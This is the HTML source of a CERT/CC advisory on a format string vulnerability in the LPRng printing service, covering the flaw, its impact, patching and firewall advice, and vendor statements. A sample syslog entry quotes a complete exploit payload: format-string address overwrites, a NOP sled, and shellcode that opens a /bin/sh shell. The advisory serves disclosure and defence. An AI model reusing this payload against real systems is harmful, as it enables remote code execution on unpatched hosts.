View Source

Original release date: December 12, 2000<BR>
Last updated: January 27, 2003<BR>
Source: CERT/CC<BR>

<P>A complete revision history is at the end of this file.

<A NAME="affected">
<H3>Systems Affected</H3>
<ul>
<li>Systems running unpatched LPRng software</li>
</ul>


<A NAME="overview">
<H2>Overview</H2>

<p>A popular replacement software package to the BSD lpd printing
service called LPRng contains at least one software defect, known as a
"format string vulnerability,"<a href="#ref1">[1]</a> which may allow
remote users to execute arbitrary code on vulnerable systems.

<A NAME="description">
<H2>I. Description</H2>

<p>
LPRng, now being packaged in several open-source operating system
distributions, has a missing format string argument in at least two
calls to the <i>syslog()</i> function.

<p>
Missing format strings in function calls allow user-supplied arguments
to be passed to a susceptible <i>*snprintf()</i> function call. Remote
users with access to the printer port (port 515/tcp) may be able to
pass format-string parameters that can overwrite arbitrary addresses
in the printing service's address space. Such overwriting can cause
segmentation violations leading to denial of printing services or to
the execution of arbitrary code injected through other means into the
memory segments of the printer service.

</p>

<p>Sample syslog entries from successful exploitation of this
vulnerability have been reported, as follows:
<br>
<font face="mono">
<pre>
Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
'BB{E8}{F3}{FF}{BF}{E9}{F3}{FF}{BF}{EA}{F3}{FF}{BF}{EB}{F3}{FF}{BF}
XXXXXXXXXXXXXXXXXX%.168u%300$nsecurity.%301 $nsecurity%302$n%.192u%303$n
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}
1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2}{B2}f{89}{D0}1{C9}{89}{CB}C{89}
]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7}
E{EE}{F}'{89}M{F0}{8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}
M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}
?{89}{D0}{CD}{80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}
E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF}/bin/sh{A}'
</pre>
</font>

</p>

<dl>
<dd><A
HREF=""></a>
</dd>
</dl>



<P>This vulnerability has been assigned the identifier CAN-2000-0917 by
the Common Vulnerabilities and Exposures (CVE) group:

<dl>
<dd><A
HREF="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917</a>
</dd>
</dl>

</p>

<p>The CERT/CC has received reports of extensive probing to port
515/tcp. In addition, we have received some reports of systems
compromised using this vulnerability. Tools exploiting this
vulnerability have been posted to public forums.


<A NAME="impact">
<H2>II. Impact</H2>

<p>
A remote user may be able to execute arbitrary code with elevated
privileges.
</p>

<p>
In addition, the printing service may be disrupted or disabled entirely.
</p>

<A NAME="solution">
<H2>III. Solution</H2>

<H4>Apply a patch from your vendor</H4>

<p>Upgrade to a non-vulnerable version of LPRng (3.6.25), as described
in the vendor sections below. Alternately, you can obtain the version
of LPRng which fixes the missing format string at:

<DL><DD>
<a href="ftp://ftp.astart.com/pub/LPRng/LPRng/LPRng-3.6.25.tgz">ftp://ftp.astart.com/pub/LPRng/LPRng/LPRng-3.6.25.tgz</a>
</DL>


<H4>Disallow access to printer service ports (typically 515/tcp) using
firewall or packet-filtering technologies</H4>

<p>Blocking access to the vulnerable service will limit your exposure
to attacks from outside your network perimeter. However, the
vulnerability would still allow local users to gain privileges they
normally shouldn't have; in addition, blocking port 515/tcp at a
network perimeter would still allow any remote user inside the
perimeter to exploit the vulnerability.


<A NAME="vendors">
<H2>Appendix A. Vendor Information</H2>

<a name="apple">
<H3>Apple</H3>
<p>
Apple has conducted an investigation and determined that Mac OS X
Public Beta and Mac OS X Server do not use LPRng and are therefore not
vulnerable to this exploitation.
</P>

<a name="caldera">
<H3>Caldera OpenLinux</H3>
<P>See CSSA-2000-033.0 "format bug in LPRng" at:

<DL><DD>
<a href="http://www.calderasystems.com/support/security/advisories/CSSA-2000-033.0.txt
">http://www.calderasystems.com/support/security/advisories/CSSA-2000-033.0.txt
</a>
</DD></DL>
</p>

<a name="compaq">
<H3>Compaq Computer Corporation</H3>
<p>
Compaq Tru64 UNIX S/W is not vulnerable.
</p>

<a name="freebsd">
<H3>FreeBSD</H3>

<P>FreeBSD does not include LPRng in the base system. Older versions
of FreeBSD included a vulnerable version of LPRng in the Ports
Collection but this was corrected almost 2 months ago, prior to the
release of FreeBSD 4.2. See FreeBSD Security Advisory 00:56 (<a
href="ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:56.lprng.asc">ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:56.lprng.asc</a>)
for more information.
</P>

<a name="hp">
<H3>Hewlett-Packard Company</H3>
<p>
This does not apply to HP; HP does not ship LPRng on HP-UX.
</p>

<a name="ibm">
<H3>IBM</h3>
<p>IBM's AIX operating system is not vulnerable to this security exploit.
</P>

<A name="microsoft">
<H3>Microsoft Corporation</H3>
<P>Microsoft doesn't use LPRng in any of its products, so no Microsoft products are affected by the vulnerability.
</P>

<a name="netbsd">
<H3>NetBSD</H3>

<P>
NetBSD does not include LPRng in the base system; however we do have a
third-party package of LPRng-3.6.8 which is vulnerable.

There's work underway to upgrade it to a non-vulnerable version.
</P>

<a name="openbsd">
<H3>OpenBSD</H3>
<P>OpenBSD does not ship lprng.
</P>

<a name="redhat">
<h3>RedHat</h3>

<P>LPRng Version 3.6.24 and earlier is vulnerable.

<P>See RHSA-2000:065 at:

<DL><DD>
<a href="http://www.redhat.com/support/errata/RHSA-2000-065.html">http://www.redhat.com/support/errata/RHSA-2000-065.html</a>
</DD></DL>

</P>

<a name="sgi">
<H3>SGI</h3> 

<p>IRIX does not contain LPRng support.</p>

<a name="suse">
<h3>SuSE</h3>
<p>SuSE is not vulnerable. Please see additional comments at:

<DL><DD>
<a href="http://lists.suse.com/archives/suse-security/2000-Sep/0259.html">http://lists.suse.com/archives/suse-security/2000-Sep/0259.html</a>
</dd></dl>

</P>

<H2>References</H2>
<ol>
<A NAME=ref1></a>
<li><i>VU#382365: LPRng can pass user-supplied input as  a format string parameter to syslog() calls,</i> CERT/CC, 10/06/2000, <a href="http://www.kb.cert.org/vuls/id/382365">http://www.kb.cert.org/vuls/id/382365</a></li> 
</ol>



<HR NOSHADE>

<P>The CERT Coordination Center thanks Chris Evans for his initial
report on the vulnerability described in this advisory.


<HR NOSHADE>

<P>Author: This document was written by Jeffrey S Havrilla. 
<A HREF="mailto:cert@cert.org?subject=CA-2000-22%20Feedback%20VU%23382365">
Feedback</A> on this advisory is appreciated.

<P>

<!--#include virtual="/include/footer_nocopyright.html" -->

<P>Copyright 2000 Carnegie Mellon University.</P>

<P>Revision History
<FONT FACE="monospace">
<PRE>
Dec 12, 2000: Initial Release
Dec 12, 2000: Updated name anchor for reference #1
Jan 27, 2003: Updated URL in Red Hat vendor statement
</PRE>
</FONT>